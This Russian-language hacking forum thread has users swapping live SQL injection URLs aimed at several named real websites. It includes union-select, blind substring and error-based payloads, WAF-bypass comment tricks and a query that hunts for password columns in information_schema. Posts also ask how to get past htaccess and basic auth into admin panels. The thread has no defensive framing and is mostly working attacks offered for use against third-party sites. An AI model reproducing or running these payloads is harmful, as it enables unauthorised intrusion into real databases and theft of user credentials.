Почему не показывают версии? http://www.catpaisatge.net/dossiers/jardins/eng/jardins_historics.php?idZona=244%29%20union%20sElect%20version%28%29+--+
http://www.catpaisatge.net/dossiers/jardins/eng/premsa2.php?idReg=-3307+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
URL уязвима http://forums.gamesquad.com/wfhq-ld-ladder-games.php?ld=on&ladder=The+Operational+Art+of+War+%28TOAW%29&viewuser=1086 не может рассчитывать колонны
Лучше не вводи в заблуждение народ, если не знаешь. Есть там инъект. Code: http://forums.gamesquad.com/wfhq-ld-ladder-games.php?ld=on&ladder=The+Operational+Art+of+War+%28TOAW%29&viewuser=1086%0AaNd%0ASuBsTrInG(version(),1,1)=5# ошибка выводится Code: http://forums.gamesquad.com/wfhq-ld-ladder-games.php?ld=on&ladder=The+Operational+Art+of+War+%28TOAW%29&viewuser=1086%0AaNd%0ASuBsTrInG(version(),1,1)=777# Ошибки нет
Помогите раскрутить скулю. http://banken.ruilen.nl/random.php?catid=473+union+select+version()--+ а вот database() уже не показывает почему то.Пишет Unknown column 'admin_ruilen' in 'where clause' Вывод обрезанный, вроде четвертая версия. Буду рад любым примерам, т.к. опыта маловато... Вывод в ошибке.
Версия пятая http://banken.ruilen.nl/random.php?catid=473+and+ascii(lower(substring(version(),1,1)))=53--+ зачем юзать подзапросы, есть же вывод... Я так месяц буду перебирать =( Мне бы получить таблицы и колонки с information_schema.tables/columns раз версия пятая. а я чет не могу =\
Есть вывод ошибки. Зачем посимвольно? Code: http://banken.ruilen.nl/random.php?catid=473+and+row(1,1)%3E(select%20count(*),concat(version(),0x3a,floor(rand()*2))+x+from+(select+1+union+select+2)a+group+by+x+limit+1)#
Разумеется один из методов. Ты предпочитаешь использовать не оптимальные и медленные способы? Чем оптимальные и быстрые, которые хотят видеть просящие помочь? 0_о Это все равно, что пить воду с помощью вилки(медленно, но все же один из способов). Пойду коньяка жахну с горя.
Полностью поддерживаю. Оптимально. Не мог бы ты ткнуть на статейку по приведенному тобой методу. Т.к. мне во многих местах непонятно что к чему, какие запросы что выполняют и для чего =) Я первый раз сталкиваюсь с подобным. И все равно как получить имена таблиц и колумнов не понял =) А это главный вопрос, и просьба...
добрый день! Почему второй запрос появляется ошибка? http://www.filarmonika.com/book-description.php?pid=-3+/*!Union+SELECT+1,2,3,version(),5,6,7,8,9/**/*/+--+ -->5.1.47 http://www.filarmonika.com/book-description.php?pid=-3+/*!Union+SELECT+1,2,3,version(),5,6,7,8,9/**/%20fRom/ **/information_schema.tables/**/wheRe/**/tAble_schema=dataBase()*/+--+ --> error 403
haito Code: http://www.filarmonika.com/book-description.php?pid=3+and+1=2+/*!union*/+select+1,2,3,GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NAME)+SEPARATOR+0x3C62723E),5,6,7,8,9+from+information_schema.columns+where+column_name+like+0x257061737325+or+column_name+like+0x25702577256425--+ таблица:abriledi_filarmonika:member_login PS:admin-panel там под hataccessom, просто под юзером логинеться смысла нет ( там даже uploada нет, так что скуль гиблая, люди кто знает способы обхода хтаццесса подскажите ) Seravin Не стоит вводить людей в заблуждение )
всем привет! вот скуля: Code: _http://www.fcdinamokirov.ru/2010/news10.php?seldate_down=20110101+union+select+1,2, 3,concat_ws(char(58),version(),user(),database(),@ @version_compile_os),5,6,7+--+ админка: Code: _http://www.fcdinamokirov.ru/admin.php как зайти в админку с помощью скуля?возможно ли?
иди лучше и подумай что ты будешь писать в сочинение "Как я провел лето", вопрос тупее некуда... даже нубом обозвать тебя и то будет похвалой.. тебе бейсик авторизация говорит о чем нибудь?
упой вопрос, раньше их пропускал, а ща задумался. Есть ли смысл продолжать искать скули, если вылезает страница с надписью "hacking attempt" либо подобные редиректы?
все зависит от скули...это как способ защиты..большинство помимо редиректа и другой арсенал используют для защиты...но попытка не пытка, бывало что канало лишь подзапросами...а бывало что и нормально работал запрос...
